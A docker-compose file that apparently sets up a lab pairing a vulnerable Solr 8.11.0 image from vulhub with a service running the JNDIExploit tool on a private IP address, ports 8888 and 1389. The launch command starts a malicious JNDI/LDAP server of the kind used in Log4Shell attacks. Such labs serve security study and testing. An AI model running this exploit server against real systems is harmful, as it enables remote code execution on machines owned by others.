version: '2'
services:
 t1:
   image: vulhub/solr:8.11.0
   ports:
    - "8983:8983"
 t2:
   image: test:latest
   ports:
    - "8888:8888"
    - "1389:1389"
   command: bash -c "java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.147.128 -p 8888"

